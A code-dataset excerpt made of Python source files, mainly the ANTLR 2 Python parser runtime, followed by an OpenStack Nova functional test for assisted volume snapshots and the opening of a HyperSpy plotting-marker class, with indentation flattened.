def __init__(self,data=None):
if not data:
BitSet.__init__(self,[long(0)])
return
if isinstance(data,int):
BitSet.__init__(self,[long(data)])
return
if isinstance(data,long):
BitSet.__init__(self,[data])
return
if not isinstance(data,list):
raise TypeError("BitSet requires integer, long, or " +
"list argument")
for x in data:
if not isinstance(x,long):
raise TypeError(self,"List argument item is " +
"not a long: %s" % (x))
self.data = data
def __str__(self):
bits = len(self.data) * BitSet.BITS
s = ""
for i in xrange(0,bits):
if self.at(i):
s += "1"
else:
s += "o"
if not ((i+1) % 10):
s += '|%s|' % (i+1)
return s
def __repr__(self):
return str(self)
def member(self,item):
if not item:
return False
if isinstance(item,int):
return self.at(item)
if not is_string_type(item):
raise TypeError(self,"char or unichar expected: %s" % (item))
## char is a (unicode) string with at most lenght 1, ie.
## a char.
if len(item) != 1:
raise TypeError(self,"char expected: %s" % (item))
### handle ASCII/UNICODE char
num = ord(item)
### check whether position num is in bitset
return self.at(num)
def wordNumber(self,bit):
return bit >> BitSet.LOG_BITS
def bitMask(self,bit):
pos = bit & BitSet.MOD_MASK ## bit mod BITS
return (1L << pos)
def set(self,bit,on=True):
# grow bitset as required (use with care!)
i = self.wordNumber(bit)
mask = self.bitMask(bit)
if i>=len(self.data):
d = i - len(self.data) + 1
for x in xrange(0,d):
self.data.append(0L)
assert len(self.data) == i+1
if on:
self.data[i] |= mask
else:
self.data[i] &= (~mask)
### make add an alias for set
add = set
def off(self,bit,off=True):
self.set(bit,not off)
def at(self,bit):
i = self.wordNumber(bit)
v = self.data[i]
m = self.bitMask(bit)
return v & m
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### some further funcs ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
def illegalarg_ex(func):
raise ValueError(
"%s is only valid if parser is built for debugging" %
(func.func_name))
def runtime_ex(func):
raise RuntimeException(
"%s is only valid if parser is built for debugging" %
(func.func_name))
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenBuffer ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenBuffer(object):
def __init__(self,stream):
self.input = stream
self.nMarkers = 0
self.markerOffset = 0
self.numToConsume = 0
self.queue = Queue()
def reset(self) :
self.nMarkers = 0
self.markerOffset = 0
self.numToConsume = 0
self.queue.reset()
def consume(self) :
self.numToConsume += 1
def fill(self, amount):
self.syncConsume()
while self.queue.length() < (amount + self.markerOffset):
self.queue.append(self.input.nextToken())
def getInput(self):
return self.input
def LA(self,k) :
self.fill(k)
return self.queue.elementAt(self.markerOffset + k - 1).type
def LT(self,k) :
self.fill(k)
return self.queue.elementAt(self.markerOffset + k - 1)
def mark(self) :
self.syncConsume()
self.nMarkers += 1
return self.markerOffset
def rewind(self,mark) :
self.syncConsume()
self.markerOffset = mark
self.nMarkers -= 1
def syncConsume(self) :
while self.numToConsume > 0:
if self.nMarkers > 0:
# guess mode -- leave leading characters and bump offset.
self.markerOffset += 1
else:
# normal mode -- remove first character
self.queue.removeFirst()
self.numToConsume -= 1
def __str__(self):
return "(%s,%s,%s,%s,%s)" % (
self.input,
self.nMarkers,
self.markerOffset,
self.numToConsume,
self.queue)
def __repr__(self):
return str(self)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ParserSharedInputState ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ParserSharedInputState(object):
def __init__(self):
self.input = None
self.reset()
def reset(self):
self.guessing = 0
self.filename = None
if self.input:
self.input.reset()
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Parser ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class Parser(object):
def __init__(self, *args, **kwargs):
self.tokenNames = None
self.returnAST = None
self.astFactory = None
self.tokenTypeToASTClassMap = {}
self.ignoreInvalidDebugCalls = False
self.traceDepth = 0
if not args:
self.inputState = ParserSharedInputState()
return
arg0 = args[0]
assert isinstance(arg0,ParserSharedInputState)
self.inputState = arg0
return
def getTokenTypeToASTClassMap(self):
return self.tokenTypeToASTClassMap
def addMessageListener(self, l):
if not self.ignoreInvalidDebugCalls:
illegalarg_ex(addMessageListener)
def addParserListener(self,l) :
if (not self.ignoreInvalidDebugCalls) :
illegalarg_ex(addParserListener)
def addParserMatchListener(self, l) :
if (not self.ignoreInvalidDebugCalls) :
illegalarg_ex(addParserMatchListener)
def addParserTokenListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
illegalarg_ex(addParserTokenListener)
def addSemanticPredicateListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
illegalarg_ex(addSemanticPredicateListener)
def addSyntacticPredicateListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
illegalarg_ex(addSyntacticPredicateListener)
def addTraceListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
illegalarg_ex(addTraceListener)
def consume(self):
raise NotImplementedError()
def _consumeUntil_type(self,tokenType):
while self.LA(1) != EOF_TYPE and self.LA(1) != tokenType:
self.consume()
def _consumeUntil_bitset(self, set):
while self.LA(1) != EOF_TYPE and not set.member(self.LA(1)):
self.consume()
def consumeUntil(self,arg):
if isinstance(arg,int):
self._consumeUntil_type(arg)
else:
self._consumeUntil_bitset(arg)
def defaultDebuggingSetup(self):
pass
def getAST(self) :
return self.returnAST
def getASTFactory(self) :
return self.astFactory
def getFilename(self) :
return self.inputState.filename
def getInputState(self) :
return self.inputState
def setInputState(self, state) :
self.inputState = state
def getTokenName(self,num) :
return self.tokenNames[num]
def getTokenNames(self) :
return self.tokenNames
def isDebugMode(self) :
return self.false
def LA(self, i):
raise NotImplementedError()
def LT(self, i):
raise NotImplementedError()
def mark(self):
return self.inputState.input.mark()
def _match_int(self,t):
if (self.LA(1) != t):
raise MismatchedTokenException(
self.tokenNames, self.LT(1), t, False, self.getFilename())
else:
self.consume()
def _match_set(self, b):
if (not b.member(self.LA(1))):
raise MismatchedTokenException(
self.tokenNames,self.LT(1), b, False, self.getFilename())
else:
self.consume()
def match(self,set) :
if isinstance(set,int):
self._match_int(set)
return
if isinstance(set,BitSet):
self._match_set(set)
return
raise TypeError("Parser.match requires integer ot BitSet argument")
def matchNot(self,t):
if self.LA(1) == t:
raise MismatchedTokenException(
tokenNames, self.LT(1), t, True, self.getFilename())
else:
self.consume()
def removeMessageListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(removeMessageListener)
def removeParserListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(removeParserListener)
def removeParserMatchListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(removeParserMatchListener)
def removeParserTokenListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(removeParserTokenListener)
def removeSemanticPredicateListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(removeSemanticPredicateListener)
def removeSyntacticPredicateListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(removeSyntacticPredicateListener)
def removeTraceListener(self, l) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(removeTraceListener)
def reportError(self,x) :
fmt = "syntax error:"
f = self.getFilename()
if f:
fmt = ("%s:" % f) + fmt
if isinstance(x,Token):
line = x.getColumn()
col = x.getLine()
text = x.getText()
fmt = fmt + 'unexpected symbol at line %s (column %s) : "%s"'
print >>sys.stderr, fmt % (line,col,text)
else:
print >>sys.stderr, fmt,str(x)
def reportWarning(self,s):
f = self.getFilename()
if f:
print "%s:warning: %s" % (f,str(x))
else:
print "warning: %s" % (str(x))
def rewind(self, pos) :
self.inputState.input.rewind(pos)
def setASTFactory(self, f) :
self.astFactory = f
def setASTNodeClass(self, cl) :
self.astFactory.setASTNodeType(cl)
def setASTNodeType(self, nodeType) :
self.setASTNodeClass(nodeType)
def setDebugMode(self, debugMode) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(setDebugMode)
def setFilename(self, f) :
self.inputState.filename = f
def setIgnoreInvalidDebugCalls(self, value) :
self.ignoreInvalidDebugCalls = value
def setTokenBuffer(self, t) :
self.inputState.input = t
def traceIndent(self):
print " " * self.traceDepth
def traceIn(self,rname):
self.traceDepth += 1
self.trace("> ", rname)
def traceOut(self,rname):
self.trace("< ", rname)
self.traceDepth -= 1
### wh: moved from ASTFactory to Parser
def addASTChild(self,currentAST, child):
if not child:
return
if not currentAST.root:
currentAST.root = child
elif not currentAST.child:
currentAST.root.setFirstChild(child)
else:
currentAST.child.setNextSibling(child)
currentAST.child = child
currentAST.advanceChildToEnd()
### wh: moved from ASTFactory to Parser
def makeASTRoot(self,currentAST,root) :
if root:
### Add the current root as a child of new root
root.addChild(currentAST.root)
### The new current child is the last sibling of the old root
currentAST.child = currentAST.root
currentAST.advanceChildToEnd()
### Set the new root
currentAST.root = root
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### LLkParser ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class LLkParser(Parser):
def __init__(self, *args, **kwargs):
try:
arg1 = args[0]
except:
arg1 = 1
if isinstance(arg1,int):
super(LLkParser,self).__init__()
self.k = arg1
return
if isinstance(arg1,ParserSharedInputState):
super(LLkParser,self).__init__(arg1)
self.set_k(1,*args)
return
if isinstance(arg1,TokenBuffer):
super(LLkParser,self).__init__()
self.setTokenBuffer(arg1)
self.set_k(1,*args)
return
if isinstance(arg1,TokenStream):
super(LLkParser,self).__init__()
tokenBuf = TokenBuffer(arg1)
self.setTokenBuffer(tokenBuf)
self.set_k(1,*args)
return
### unknown argument
raise TypeError("LLkParser requires integer, " +
"ParserSharedInputStream or TokenStream argument")
def consume(self):
self.inputState.input.consume()
def LA(self,i):
return self.inputState.input.LA(i)
def LT(self,i):
return self.inputState.input.LT(i)
def set_k(self,index,*args):
try:
self.k = args[index]
except:
self.k = 1
def trace(self,ee,rname):
print type(self)
self.traceIndent()
guess = ""
if self.inputState.guessing > 0:
guess = " [guessing]"
print(ee + rname + guess)
for i in xrange(1,self.k+1):
if i != 1:
print(", ")
if self.LT(i) :
v = self.LT(i).getText()
else:
v = "null"
print "LA(%s) == %s" % (i,v)
print("\n")
def traceIn(self,rname):
self.traceDepth += 1;
self.trace("> ", rname);
def traceOut(self,rname):
self.trace("< ", rname);
self.traceDepth -= 1;
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TreeParserSharedInputState ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TreeParserSharedInputState(object):
def __init__(self):
self.guessing = 0
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TreeParser ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TreeParser(object):
def __init__(self, *args, **kwargs):
self.inputState = TreeParserSharedInputState()
self._retTree = None
self.tokenNames = []
self.returnAST = None
self.astFactory = ASTFactory()
self.traceDepth = 0
def getAST(self):
return self.returnAST
def getASTFactory(self):
return self.astFactory
def getTokenName(self,num) :
return self.tokenNames[num]
def getTokenNames(self):
return self.tokenNames
def match(self,t,set) :
assert isinstance(set,int) or isinstance(set,BitSet)
if not t or t == ASTNULL:
raise MismatchedTokenException(self.getTokenNames(), t,set, False)
if isinstance(set,int) and t.getType() != set:
raise MismatchedTokenException(self.getTokenNames(), t,set, False)
if isinstance(set,BitSet) and not set.member(t.getType):
raise MismatchedTokenException(self.getTokenNames(), t,set, False)
def matchNot(self,t, ttype) :
if not t or (t == ASTNULL) or (t.getType() == ttype):
raise MismatchedTokenException(getTokenNames(), t, ttype, True)
def reportError(self,ex):
print >>sys.stderr,"error:",ex
def reportWarning(self, s):
print "warning:",s
def setASTFactory(self,f):
self.astFactory = f
def setASTNodeType(self,nodeType):
self.setASTNodeClass(nodeType)
def setASTNodeClass(self,nodeType):
self.astFactory.setASTNodeType(nodeType)
def traceIndent(self):
print " " * self.traceDepth
def traceIn(self,rname,t):
self.traceDepth += 1
self.traceIndent()
print("> " + rname + "(" +
ifelse(t,str(t),"null") + ")" +
ifelse(self.inputState.guessing>0,"[guessing]",""))
def traceOut(self,rname,t):
self.traceIndent()
print("< " + rname + "(" +
ifelse(t,str(t),"null") + ")" +
ifelse(self.inputState.guessing>0,"[guessing]",""))
self.traceDepth -= 1
### wh: moved from ASTFactory to TreeParser
def addASTChild(self,currentAST, child):
if not child:
return
if not currentAST.root:
currentAST.root = child
elif not currentAST.child:
currentAST.root.setFirstChild(child)
else:
currentAST.child.setNextSibling(child)
currentAST.child = child
currentAST.advanceChildToEnd()
### wh: moved from ASTFactory to TreeParser
def makeASTRoot(self,currentAST,root):
if root:
### Add the current root as a child of new root
root.addChild(currentAST.root)
### The new current child is the last sibling of the old root
currentAST.child = currentAST.root
currentAST.advanceChildToEnd()
### Set the new root
currentAST.root = root
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### funcs to work on trees ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
def rightmost(ast):
if ast:
while(ast.right):
ast = ast.right
return ast
def cmptree(s,t,partial):
while(s and t):
### as a quick optimization, check roots first.
if not s.equals(t):
return False
### if roots match, do full list match test on children.
if not cmptree(s.getFirstChild(),t.getFirstChild(),partial):
return False
s = s.getNextSibling()
t = t.getNextSibling()
r = ifelse(partial,not t,not s and not t)
return r
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### AST ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class AST(object):
def __init__(self):
pass
def addChild(self, c):
pass
def equals(self, t):
return False
def equalsList(self, t):
return False
def equalsListPartial(self, t):
return False
def equalsTree(self, t):
return False
def equalsTreePartial(self, t):
return False
def findAll(self, tree):
return None
def findAllPartial(self, subtree):
return None
def getFirstChild(self):
return self
def getNextSibling(self):
return self
def getText(self):
return ""
def getType(self):
return INVALID_TYPE
def getLine(self):
return 0
def getColumn(self):
return 0
def getNumberOfChildren(self):
return 0
def initialize(self, t, txt):
pass
def initialize(self, t):
pass
def setFirstChild(self, c):
pass
def setNextSibling(self, n):
pass
def setText(self, text):
pass
def setType(self, ttype):
pass
def toString(self):
self.getText()
__str__ = toString
def toStringList(self):
return self.getText()
def toStringTree(self):
return self.getText()
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ASTNULLType ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### There is only one instance of this class **/
class ASTNULLType(AST):
def __init__(self):
AST.__init__(self)
pass
def getText(self):
return "<ASTNULL>"
def getType(self):
return NULL_TREE_LOOKAHEAD
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### BaseAST ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class BaseAST(AST):
verboseStringConversion = False
tokenNames = None
def __init__(self):
self.down = None ## kid
self.right = None ## sibling
def addChild(self,node):
if node:
t = rightmost(self.down)
if t:
t.right = node
else:
assert not self.down
self.down = node
def getNumberOfChildren(self):
t = self.down
n = 0
while t:
n += 1
t = t.right
return n
def doWorkForFindAll(self,v,target,partialMatch):
sibling = self
while sibling:
c1 = partialMatch and sibling.equalsTreePartial(target)
if c1:
v.append(sibling)
else:
c2 = not partialMatch and sibling.equalsTree(target)
if c2:
v.append(sibling)
### regardless of match or not, check any children for matches
if sibling.getFirstChild():
sibling.getFirstChild().doWorkForFindAll(v,target,partialMatch)
sibling = sibling.getNextSibling()
### Is node t equal to 'self' in terms of token type and text?
def equals(self,t):
if not t:
return False
return self.getText() == t.getText() and self.getType() == t.getType()
### Is t an exact structural and equals() match of this tree. The
### 'self' reference is considered the start of a sibling list.
###
def equalsList(self, t):
return cmptree(self, t, partial=False)
### Is 't' a subtree of this list?
### The siblings of the root are NOT ignored.
###
def equalsListPartial(self,t):
return cmptree(self,t,partial=True)
### Is tree rooted at 'self' equal to 't'? The siblings
### of 'self' are ignored.
###
def equalsTree(self, t):
return self.equals(t) and \
cmptree(self.getFirstChild(), t.getFirstChild(), partial=False)
### Is 't' a subtree of the tree rooted at 'self'? The siblings
### of 'self' are ignored.
###
def equalsTreePartial(self, t):
if not t:
return True
return self.equals(t) and cmptree(
self.getFirstChild(), t.getFirstChild(), partial=True)
### Walk the tree looking for all exact subtree matches. Return
### an ASTEnumerator that lets the caller walk the list
### of subtree roots found herein.
def findAll(self,target):
roots = []
### the empty tree cannot result in an enumeration
if not target:
return None
# find all matches recursively
self.doWorkForFindAll(roots, target, False)
return roots
### Walk the tree looking for all subtrees. Return
### an ASTEnumerator that lets the caller walk the list
### of subtree roots found herein.
def findAllPartial(self,sub):
roots = []
### the empty tree cannot result in an enumeration
if not sub:
return None
self.doWorkForFindAll(roots, sub, True) ### find all matches recursively
return roots
### Get the first child of this node None if not children
def getFirstChild(self):
return self.down
### Get the next sibling in line after this one
def getNextSibling(self):
return self.right
### Get the token text for this node
def getText(self):
return ""
### Get the token type for this node
def getType(self):
return 0
def getLine(self):
return 0
def getColumn(self):
return 0
### Remove all children */
def removeChildren(self):
self.down = None
def setFirstChild(self,c):
self.down = c
def setNextSibling(self, n):
self.right = n
### Set the token text for this node
def setText(self, text):
pass
### Set the token type for this node
def setType(self, ttype):
pass
### static
def setVerboseStringConversion(verbose,names):
verboseStringConversion = verbose
tokenNames = names
setVerboseStringConversion = staticmethod(setVerboseStringConversion)
### Return an array of strings that maps token ID to it's text.
## @since 2.7.3
def getTokenNames():
return tokenNames
def toString(self):
return self.getText()
### return tree as lisp string - sibling included
def toStringList(self):
ts = self.toStringTree()
sib = self.getNextSibling()
if sib:
ts += sib.toStringList()
return ts
__str__ = toStringList
### return tree as string - siblings ignored
def toStringTree(self):
ts = ""
kid = self.getFirstChild()
if kid:
ts += " ("
ts += " " + self.toString()
if kid:
ts += kid.toStringList()
ts += " )"
return ts
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CommonAST ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Common AST node implementation
class CommonAST(BaseAST):
def __init__(self,token=None):
super(CommonAST,self).__init__()
self.ttype = INVALID_TYPE
self.text = "<no text>"
self.line = 0
self.column= 0
self.initialize(token)
#assert self.text
### Get the token text for this node
def getText(self):
return self.text
### Get the token type for this node
def getType(self):
return self.ttype
### Get the line for this node
def getLine(self):
return self.line
### Get the column for this node
def getColumn(self):
return self.column
def initialize(self,*args):
if not args:
return
arg0 = args[0]
if isinstance(arg0,int):
arg1 = args[1]
self.setType(arg0)
self.setText(arg1)
return
if isinstance(arg0,AST) or isinstance(arg0,Token):
self.setText(arg0.getText())
self.setType(arg0.getType())
self.line = arg0.getLine()
self.column = arg0.getColumn()
return
### Set the token text for this node
def setText(self,text_):
assert is_string_type(text_)
self.text = text_
### Set the token type for this node
def setType(self,ttype_):
assert isinstance(ttype_,int)
self.ttype = ttype_
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CommonASTWithHiddenTokens ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CommonASTWithHiddenTokens(CommonAST):
def __init__(self,*args):
CommonAST.__init__(self,*args)
self.hiddenBefore = None
self.hiddenAfter = None
def getHiddenAfter(self):
return self.hiddenAfter
def getHiddenBefore(self):
return self.hiddenBefore
def initialize(self,*args):
CommonAST.initialize(self,*args)
if args and isinstance(args[0],Token):
assert isinstance(args[0],CommonHiddenStreamToken)
self.hiddenBefore = args[0].getHiddenBefore()
self.hiddenAfter = args[0].getHiddenAfter()
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ASTPair ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ASTPair(object):
def __init__(self):
self.root = None ### current root of tree
self.child = None ### current child to which siblings are added
### Make sure that child is the last sibling */
def advanceChildToEnd(self):
if self.child:
while self.child.getNextSibling():
self.child = self.child.getNextSibling()
### Copy an ASTPair. Don't call it clone() because we want type-safety */
def copy(self):
tmp = ASTPair()
tmp.root = self.root
tmp.child = self.child
return tmp
def toString(self):
r = ifelse(not root,"null",self.root.getText())
c = ifelse(not child,"null",self.child.getText())
return "[%s,%s]" % (r,c)
__str__ = toString
__repr__ = toString
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ASTFactory ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ASTFactory(object):
def __init__(self,table=None):
self._class = None
self._classmap = ifelse(table,table,None)
def create(self,*args):
if not args:
return self.create(INVALID_TYPE)
arg0 = args[0]
arg1 = None
arg2 = None
try:
arg1 = args[1]
arg2 = args[2]
except:
pass
# ctor(int)
if isinstance(arg0,int) and not arg2:
### get class for 'self' type
c = self.getASTNodeType(arg0)
t = self.create(c)
if t:
t.initialize(arg0, ifelse(arg1,arg1,""))
return t
# ctor(int,something)
if isinstance(arg0,int) and arg2:
t = self.create(arg2)
if t:
t.initialize(arg0,arg1)
return t
# ctor(AST)
if isinstance(arg0,AST):
t = self.create(arg0.getType())
if t:
t.initialize(arg0)
return t
# ctor(token)
if isinstance(arg0,Token) and not arg1:
ttype = arg0.getType()
assert isinstance(ttype,int)
t = self.create(ttype)
if t:
t.initialize(arg0)
return t
# ctor(token,class)
if isinstance(arg0,Token) and arg1:
assert isinstance(arg1,type)
assert issubclass(arg1,AST)
# this creates instance of 'arg1' using 'arg0' as
# argument. Wow, that's magic!
t = arg1(arg0)
assert t and isinstance(t,AST)
return t
# ctor(class)
if isinstance(arg0,type):
### next statement creates instance of type (!)
t = arg0()
assert isinstance(t,AST)
return t
def setASTNodeClass(self,className=None):
if not className:
return
assert isinstance(className,type)
assert issubclass(className,AST)
self._class = className
### kind of misnomer - use setASTNodeClass instead.
setASTNodeType = setASTNodeClass
def getASTNodeClass(self):
return self._class
def getTokenTypeToASTClassMap(self):
return self._classmap
def setTokenTypeToASTClassMap(self,amap):
self._classmap = amap
def error(self, e):
import sys
print >> sys.stderr, e
def setTokenTypeASTNodeType(self, tokenType, className):
"""
Specify a mapping between a token type and a (AST) class.
"""
if not self._classmap:
self._classmap = {}
if not className:
try:
del self._classmap[tokenType]
except:
pass
else:
### here we should also perform actions to ensure that
### a. class can be loaded
### b. class is a subclass of AST
###
assert isinstance(className,type)
assert issubclass(className,AST) ## a & b
### enter the class
self._classmap[tokenType] = className
def getASTNodeType(self,tokenType):
"""
For a given token type return the AST node type. First we
lookup a mapping table, second we try _class
and finally we resolve to "antlr.CommonAST".
"""
# first
if self._classmap:
try:
c = self._classmap[tokenType]
if c:
return c
except:
pass
# second
if self._class:
return self._class
# default
return CommonAST
### methods that have been moved to file scope - just listed
### here to be somewhat consistent with original API
def dup(self,t):
return antlr.dup(t,self)
def dupList(self,t):
return antlr.dupList(t,self)
def dupTree(self,t):
return antlr.dupTree(t,self)
### methods moved to other classes
### 1. makeASTRoot -> Parser
### 2. addASTChild -> Parser
### non-standard: create alias for longish method name
maptype = setTokenTypeASTNodeType
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ASTVisitor ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ASTVisitor(object):
def __init__(self,*args):
pass
def visit(self,ast):
pass
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### static methods and variables ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
ASTNULL = ASTNULLType()
### wh: moved from ASTFactory as there's nothing ASTFactory-specific
### in this method.
def make(*nodes):
if not nodes:
return None
for i in xrange(0,len(nodes)):
node = nodes[i]
if node:
assert isinstance(node,AST)
root = nodes[0]
tail = None
if root:
root.setFirstChild(None)
for i in xrange(1,len(nodes)):
if not nodes[i]:
continue
if not root:
root = tail = nodes[i]
elif not tail:
root.setFirstChild(nodes[i])
tail = root.getFirstChild()
else:
tail.setNextSibling(nodes[i])
tail = tail.getNextSibling()
### Chase tail to last sibling
while tail.getNextSibling():
tail = tail.getNextSibling()
return root
def dup(t,factory):
if not t:
return None
if factory:
dup_t = factory.create(t.__class__)
else:
raise TypeError("dup function requires ASTFactory argument")
dup_t.initialize(t)
return dup_t
def dupList(t,factory):
result = dupTree(t,factory)
nt = result
while t:
## for each sibling of the root
t = t.getNextSibling()
nt.setNextSibling(dupTree(t,factory))
nt = nt.getNextSibling()
return result
def dupTree(t,factory):
result = dup(t,factory)
if t:
result.setFirstChild(dupList(t.getFirstChild(),factory))
return result
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
### $Id: antlr.py 3750 2009-02-13 00:13:04Z sjmachin $
# Local Variables: ***
# mode: python ***
# py-indent-offset: 4 ***
# End: ***
| apache-2.0 |
watonyweng/nova | nova/tests/functional/v3/test_assisted_volume_snapshots.py | 3 | 2837 | # Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.compute import api as compute_api
from nova.tests.functional.v3 import test_servers
from nova.tests.unit.api.openstack import fakes
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class AssistedVolumeSnapshotsJsonTests(test_servers.ServersSampleBase):
extension_name = "os-assisted-volume-snapshots"
# TODO(gmann): Overriding '_api_version' till all functional tests
# are merged between v2 and v2.1. After that base class variable
# itself can be changed to 'v2'
_api_version = 'v2'
def _get_flags(self):
f = super(AssistedVolumeSnapshotsJsonTests, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.'
'assisted_volume_snapshots.Assisted_volume_snapshots')
return f
def test_create(self):
"""Create a volume snapshots."""
self.stubs.Set(compute_api.API, 'volume_snapshot_create',
fakes.stub_compute_volume_snapshot_create)
subs = {
'volume_id': '521752a6-acf6-4b2d-bc7a-119f9148cd8c',
'snapshot_id': '421752a6-acf6-4b2d-bc7a-119f9148cd8c',
'type': 'qcow2',
'new_file': 'new_file_name'
}
response = self._do_post("os-assisted-volume-snapshots",
"snapshot-create-assisted-req",
subs)
subs.update(self._get_regexes())
self._verify_response("snapshot-create-assisted-resp",
subs, response, 200)
def test_snapshots_delete_assisted(self):
self.stubs.Set(compute_api.API, 'volume_snapshot_delete',
fakes.stub_compute_volume_snapshot_delete)
snapshot_id = '100'
response = self._do_delete(
'os-assisted-volume-snapshots/%s?delete_info='
'{"volume_id":"521752a6-acf6-4b2d-bc7a-119f9148cd8c"}'
% snapshot_id)
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
| apache-2.0 |
magnunor/hyperspy | hyperspy/drawing/_markers/vertical_line.py | 2 | 2501 | # -*- coding: utf-8 -*-
# Copyright 2007-2016 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
from hyperspy.drawing.marker import MarkerBase
class VerticalLine(MarkerBase):
